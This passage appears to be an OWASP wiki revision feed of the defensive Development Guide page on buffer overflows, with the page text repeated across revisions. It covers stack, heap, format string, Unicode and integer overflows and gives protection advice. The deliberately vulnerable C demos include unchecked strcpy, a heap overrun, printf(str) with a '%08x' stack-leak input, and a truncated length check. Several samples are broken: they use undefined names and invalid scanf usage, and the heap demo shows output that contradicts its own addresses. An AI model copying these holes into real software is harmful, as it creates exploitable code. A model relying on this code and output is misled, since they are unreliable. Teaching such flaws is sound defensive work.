==Heap Overflow ==&lt;br /&gt;
&lt;br /&gt;
Heap overflows are problematic in that they are not necessarily protected by CPUs capable of using non-executable stacks. A heap is an area of memory allocated by the application at run-time to store data. The following example, written in C, shows a heap overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define BSIZE 16&lt;br /&gt;
 #define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */&lt;br /&gt;
&lt;br /&gt;
 void main(void) {&lt;br /&gt;
    u_long b_diff;&lt;br /&gt;
    char *buf0 = (char*)malloc(BSIZE);		// create two buffers&lt;br /&gt;
    char *buf1 = (char*)malloc(BSIZE);&lt;br /&gt;
&lt;br /&gt;
    b_diff = (u_long)buf1 - (u_long)buf0;	// difference between locations&lt;br /&gt;
    printf(&amp;quot;Initial values:  &amp;quot;);&lt;br /&gt;
    printf(&amp;quot;buf0=%p, buf1=%p, b_diff=0x%x bytes\n&amp;quot;, buf0, buf1, b_diff);&lt;br /&gt;
&lt;br /&gt;
    memset(buf1, 'A', BUFSIZE-1), buf1[BUFSIZE-1] = '\0';&lt;br /&gt;
    printf(&amp;quot;Before overflow: buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
&lt;br /&gt;
    memset(buf0, 'B', (u_int)(diff + OVERSIZE));&lt;br /&gt;
    printf(&amp;quot;After overflow:  buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./heaptest&lt;br /&gt;
&lt;br /&gt;
Initial values:  buf0=0x9322008, buf1=0x9322020, diff=0xff0 bytes&lt;br /&gt;
Before overflow: buf1=AAAAAAAAAAAAAAA&lt;br /&gt;
After overflow:  buf1=BBBBBBBBAAAAAAA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The simple program above shows two buffers being allocated on the heap, with the first buffer being overflowed to overwrite the contents of the second buffer. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language)  that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Format String ==&lt;br /&gt;
&lt;br /&gt;
Format string buffer overflows (usually called &amp;quot;format string vulnerabilities&amp;quot;) are highly specialized buffer overflows that can have the same effects as other buffer overflow attacks. Basically, format string vulnerabilities take advantage of the mixture of data and control information in certain functions, such as C/C++'s printf. The easiest way to understand this class of vulnerability is with an example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
#include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void main(void) {&lt;br /&gt;
    char str[100] = scanf(&amp;quot;%s&amp;quot;);&lt;br /&gt;
    printf(&amp;quot;%s&amp;quot;, str);&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This simple program takes input from the user and displays it back on the screen. The string &amp;lt;code&amp;gt;%s&amp;lt;/code&amp;gt; means that the other parameter, str, should be displayed as a string. This example is ''not'' vulnerable to a format string attack, but if one changes the last line, it becomes exploitable:&lt;br /&gt;
&lt;br /&gt;
    printf(str);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To see how, consider the user entering the special input:&lt;br /&gt;
&lt;br /&gt;
''%08x.%08x.%08x.%08x.%08x''&lt;br /&gt;
&lt;br /&gt;
By constructing input as such, the program can be exploited to print the first five entries from the stack.  &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* uses functions such as printf, snprintf directly, or indirectly through system services (such as syslog) or other AND&lt;br /&gt;
&lt;br /&gt;
* the use of such functions allows input from the user to contain control information interpreted by the function itself&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. Specifically check for control information (meta-characters like '%')&lt;br /&gt;
# Avoid the use of functions like printf that allow user input to contain control information&lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Unicode Overflow ==&lt;br /&gt;
&lt;br /&gt;
Unicode exploits are a bit more difficult to do than typical buffer overflows as demonstrated in Anley’s 2002 paper, but it is wrong to assume that by using Unicode, you are protected against buffer overflows. Examples of Unicode overflows include Code Red, a devastating Trojan with an estimated economic cost in the billions of dollars. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* takes Unicode input from a user AND&lt;br /&gt;
&lt;br /&gt;
* fails to sanitize the input AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself  ===&lt;br /&gt;
&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Integer Overflow ==&lt;br /&gt;
&lt;br /&gt;
When an application takes two numbers of fixed word size and perform an operation with them, the result may not fit within the same word size. For example, if the two 8-bit numbers 192 and 208 are added together and stored into another 8-bit byte, the result will not fit into an 8-bit result:&lt;br /&gt;
&lt;br /&gt;
''         1100 0000''&lt;br /&gt;
&lt;br /&gt;
''  +      1101 0000''&lt;br /&gt;
&lt;br /&gt;
''  = 0001 1001 0000''&lt;br /&gt;
&lt;br /&gt;
Although such an operation will usually cause some type of exception, your application must be coded to check for such an exception and take proper action. Otherwise, your application would report that 192 + 208 equals 144.&lt;br /&gt;
&lt;br /&gt;
The following code demonstrates a buffer overflow, and was adapted from [http://www.phrack.org/phrack/60/p60-0x0a.txt Blexim's Phrack article]: [[Category:FIXME|broken link]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void main(int argc, char *argv[]) {&lt;br /&gt;
    int i = atoi(argv[1]);         // input from user&lt;br /&gt;
    unsigned short s = i;          // truncate to a short&lt;br /&gt;
    char buf[50];                  // large buffer&lt;br /&gt;
&lt;br /&gt;
    if (s &amp;gt; 10) {                  // check we're not greater than 10&lt;br /&gt;
        return;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    memcpy(buf, argv[2], i);       // copy i bytes to the buffer&lt;br /&gt;
    buf[i] = '\0';                 // add a null byte to the buffer&lt;br /&gt;
    printf(&amp;quot;%s\n&amp;quot;, buf);           // output the buffer contents&lt;br /&gt;
&lt;br /&gt;
    return;&lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./inttest 65580 foobar&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The above code is exploitable because the validation does not occur on the input value (65580), but rather the value after it has been converted to an unsigned short (45). &lt;br /&gt;
&lt;br /&gt;
Integer overflows can be a problem in any language and can be exploited when integers are used in array indices and implicit short math operations. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Examine use of signed integers, bytes, and shorts.&lt;br /&gt;
&lt;br /&gt;
* Are there cases where these values are used as array indices after performing an arithmetic operation (+, -, *, /, or % (modulo))?&lt;br /&gt;
&lt;br /&gt;
* How would your program react to a negative or zero value for integer values, particular during array lookups?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* If using .NET, use David LeBlanc’s SafeInt class or a similar construct. Otherwise, use a &amp;quot;BigInteger&amp;quot; or &amp;quot;BigDecimal&amp;quot; implementation in cases where it would be hard to validate input yourself.&lt;br /&gt;
&lt;br /&gt;
* If your compiler supports the option, change the default for integers to be unsigned unless otherwise explicitly stated. Use unsigned integers whenever you don't need negative values.&lt;br /&gt;
&lt;br /&gt;
* Use range checking if your language or framework supports it, or be sure to implement range checking yourself after all arithmetic operations.&lt;br /&gt;
&lt;br /&gt;
* Be sure to check for exceptions if your language supports it.&lt;br /&gt;
&lt;br /&gt;
==Further reading ==&lt;br /&gt;
&lt;br /&gt;
* Team Teso, ''Exploiting Format String Vulnerabilities''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Newsham, Tim, ''Format String Attacks&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;u&amp;gt;http://www.lava.net/~newsham/format-string-attacks.pdf&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* w00 w00 and Matt Conover, ''Preliminary Heap Overflow Tutorial''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w00w00.org/files/articles/heaptut.txt&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Chris Anley, ''Creating Arbitrary Shellcode In Unicode Expanded Strings''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ngssoftware.com/papers/unicodebo.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* David Leblanc, ''Integer Handling with the C++ SafeInt Class ''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure01142004.asp&amp;lt;/u&amp;gt;     &lt;br /&gt;
&lt;br /&gt;
* Aleph One, ''Smashing the Stack for fun and profit''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.phrack.org/phrack/49/P49-14&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Mark Donaldson, ''Inside the buffer Overflow Attack: Mechanism, method, &amp;amp; prevention''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://rr.sans.org/code/inside_buffer.php&amp;lt;/u&amp;gt;   [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* ''NX Bit'', Wikipedia article&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://en.wikipedia.org/wiki/NX_bit&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Horizon'', How to bypass Solaris no execute stack protection&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;u&amp;gt;http://www.secinf.net/unix_security/How_to_bypass_Solaris_nonexecutable_stack_protection_.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Alexander Anisimov'', Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass'', Positive Technologies&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.maxpatrol.com/defeating-xpsp2-heap-protection.htm&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Matt Conover, w00w00 on Heap Overflows, w00w00 Security Team&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w00w00.org/files/articles/heaptut.txt&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Blexim, ''Basic Integer Overflows&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;u&amp;gt;http://www.phrack.org/phrack/60/p60-0x0a.txt&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* StackShield&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.angelfire.com/sk/stackshield/index.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* StackGuard&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.immunix.org&amp;lt;/u&amp;gt;[[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Libsafe&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.research.avayalabs.com/project/libsafe&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59855</id>
		<title>Buffer Overflows</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59855"/>
				<updated>2009-05-02T11:47:04Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Further reading */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__'''&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that:&lt;br /&gt;
&lt;br /&gt;
* Applications do not expose themselves to faulty components.&lt;br /&gt;
&lt;br /&gt;
* Applications create as few buffer overflows as possible.&lt;br /&gt;
&lt;br /&gt;
* Developers are encouraged to use languages and frameworks that are relatively immune to buffer overflows.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
Almost every platform, with the following notable exceptions:&lt;br /&gt;
&lt;br /&gt;
* Java/J2EE – as long as native methods or system calls are not invoked.&lt;br /&gt;
&lt;br /&gt;
* .NET – as long as unsafe or unmanaged code is not invoked (such as the use of P/Invoke or COM Interop).&lt;br /&gt;
&lt;br /&gt;
* PHP, Python, Perl – as long as external programs or vulnerable extensions are not used.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11.9 – Data processing integrity.&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Attackers generally use [[Buffer Overflow|buffer overflows]] to corrupt the execution stack of a web application. By sending carefully crafted input to a web application, an attacker can cause the web application to execute arbitrary code, possibly taking over the machine. Attackers have managed to identify buffer overflows in a staggering array of products and components. &lt;br /&gt;
&lt;br /&gt;
Buffer overflow flaws can be present in both the web server and application server products that serve the static and dynamic portions of a site, or in the web application itself. Buffer overflows found in commonly-used server products are likely to become widely known and can pose a significant risk to users of these products. When web applications use libraries, such as a graphics library to generate images or a communications library to send e-mail, they open themselves to potential buffer overflow attacks. Literature detailing buffer overflow attacks against commonly-used products is readily available, and newly discovered vulnerabilities are reported almost daily. &lt;br /&gt;
&lt;br /&gt;
Buffer overflows can also be found in custom web application code, and may even be more likely, given the lack of scrutiny that web applications typically go through. Buffer overflow attacks against customized web applications can sometimes lead to interesting results. In some cases, we have discovered that sending large inputs can cause the web application or the back-end database to malfunction. It is possible to cause a denial of service attack against the web site, depending on the severity and specific nature of the flaw. Overly large inputs could cause the application to display a detailed error message, potentially leading to a successful attack on the system.&lt;br /&gt;
&lt;br /&gt;
Buffer overflow attacks generally rely upon two techniques (and usually the combination):&lt;br /&gt;
&lt;br /&gt;
* Writing data to particular memory addresses&lt;br /&gt;
&lt;br /&gt;
* Having the operating system mishandle data types&lt;br /&gt;
&lt;br /&gt;
* This means that strongly-typed programming languages (and environments) that disallow direct memory access usually prevent buffer overflows from happening.&lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
|-&lt;br /&gt;
 ! Language/Environment !! Compiled or Interpreted !! Strongly Typed !! Direct Memory Access !! Safe or Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Java, Java Virtual Machine (JVM) || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || .NET || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Perl  || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Python - interpreted || Intepreted || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Ruby || Interpreted || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || C/C++ || Compiled || No || Yes || Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Assembly || Compiled || No || Yes || Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || COBOL || Compiled || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
Table 8.1: Language descriptions&lt;br /&gt;
&lt;br /&gt;
==General Prevention Techniques ==&lt;br /&gt;
&lt;br /&gt;
A number of general techniques to prevent buffer overflows include:&lt;br /&gt;
&lt;br /&gt;
* Code auditing (automated or manual)&lt;br /&gt;
&lt;br /&gt;
* Developer training – bounds checking, use of unsafe functions, and group standards&lt;br /&gt;
&lt;br /&gt;
* Non-executable stacks – many operating systems have at least some support for this&lt;br /&gt;
&lt;br /&gt;
* Compiler tools – StackShield, StackGuard, and Libsafe, among others&lt;br /&gt;
&lt;br /&gt;
* Safe functions – use strncat instead of strcat, strncpy instead of strcpy, etc&lt;br /&gt;
&lt;br /&gt;
* Patches – Be sure to keep your web and application servers fully patched, and be aware of bug reports relating to applications upon which your code is dependent.&lt;br /&gt;
&lt;br /&gt;
* Periodically scan your application with one or more of the commonly available scanners that look for buffer overflow flaws in your server products and your custom web applications. &lt;br /&gt;
&lt;br /&gt;
==Stack Overflow ==&lt;br /&gt;
&lt;br /&gt;
Stack overflows are the best understood and the most common form of buffer overflows. The basics of a stack overflow is simple:&lt;br /&gt;
&lt;br /&gt;
* There are two buffers, a source buffer containing arbitrary input (presumably from the attacker), and a destination buffer that is too small for the attack input. The second buffer resides on the stack and somewhat adjacent to the function return address on the stack.&lt;br /&gt;
&lt;br /&gt;
* The faulty code does ''not'' check that the source buffer is too large to fit in the destination buffer. It copies the attack input to the destination buffer, overwriting additional information on the stack (such as the function return address).&lt;br /&gt;
&lt;br /&gt;
* When the function returns, the CPU unwinds the stack frame and pops the (now modified) return address from the stack.&lt;br /&gt;
&lt;br /&gt;
* Control does not return to the function as it should. Instead, arbitrary code (chosen by the attacker when crafting the initial input) is executed. &lt;br /&gt;
&lt;br /&gt;
The following example, written in C, demonstrates a stack overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void f(char* s) {&lt;br /&gt;
    char buffer[10];&lt;br /&gt;
    strcpy(buffer, s);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
void main(void) {&lt;br /&gt;
    f(&amp;quot;01234567890123456789&amp;quot;);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./stacktest&lt;br /&gt;
&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values or non-executable stacks to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Heap Overflow ==&lt;br /&gt;
&lt;br /&gt;
Heap overflows are problematic in that they are not necessarily protected by CPUs capable of using non-executable stacks. A heap is an area of memory allocated by the application at run-time to store data. The following example, written in C, shows a heap overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define BSIZE 16&lt;br /&gt;
 #define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */&lt;br /&gt;
&lt;br /&gt;
 void main(void) {&lt;br /&gt;
    u_long b_diff;&lt;br /&gt;
    char *buf0 = (char*)malloc(BSIZE);		// create two buffers&lt;br /&gt;
    char *buf1 = (char*)malloc(BSIZE);&lt;br /&gt;
&lt;br /&gt;
    b_diff = (u_long)buf1 - (u_long)buf0;	// difference between locations&lt;br /&gt;
    printf(&amp;quot;Initial values:  &amp;quot;);&lt;br /&gt;
    printf(&amp;quot;buf0=%p, buf1=%p, b_diff=0x%x bytes\n&amp;quot;, buf0, buf1, b_diff);&lt;br /&gt;
&lt;br /&gt;
    memset(buf1, 'A', BUFSIZE-1), buf1[BUFSIZE-1] = '\0';&lt;br /&gt;
    printf(&amp;quot;Before overflow: buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
&lt;br /&gt;
    memset(buf0, 'B', (u_int)(diff + OVERSIZE));&lt;br /&gt;
    printf(&amp;quot;After overflow:  buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./heaptest&lt;br /&gt;
&lt;br /&gt;
Initial values:  buf0=0x9322008, buf1=0x9322020, diff=0xff0 bytes&lt;br /&gt;
Before overflow: buf1=AAAAAAAAAAAAAAA&lt;br /&gt;
After overflow:  buf1=BBBBBBBBAAAAAAA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The simple program above shows two buffers being allocated on the heap, with the first buffer being overflowed to overwrite the contents of the second buffer. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language)  that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Format String ==&lt;br /&gt;
&lt;br /&gt;
Format string buffer overflows (usually called &amp;quot;format string vulnerabilities&amp;quot;) are highly specialized buffer overflows that can have the same effects as other buffer overflow attacks. Basically, format string vulnerabilities take advantage of the mixture of data and control information in certain functions, such as C/C++'s printf. The easiest way to understand this class of vulnerability is with an example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
#include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void main(void) {&lt;br /&gt;
    char str[100] = scanf(&amp;quot;%s&amp;quot;);&lt;br /&gt;
    printf(&amp;quot;%s&amp;quot;, str);&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This simple program takes input from the user and displays it back on the screen. The string &amp;lt;code&amp;gt;%s&amp;lt;/code&amp;gt; means that the other parameter, str, should be displayed as a string. This example is ''not'' vulnerable to a format string attack, but if one changes the last line, it becomes exploitable:&lt;br /&gt;
&lt;br /&gt;
    printf(str);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To see how, consider the user entering the special input:&lt;br /&gt;
&lt;br /&gt;
''%08x.%08x.%08x.%08x.%08x''&lt;br /&gt;
&lt;br /&gt;
By constructing input as such, the program can be exploited to print the first five entries from the stack.  &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* uses functions such as printf, snprintf directly, or indirectly through system services (such as syslog) or other AND&lt;br /&gt;
&lt;br /&gt;
* the use of such functions allows input from the user to contain control information interpreted by the function itself&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. Specifically check for control information (meta-characters like '%')&lt;br /&gt;
# Avoid the use of functions like printf that allow user input to contain control information&lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
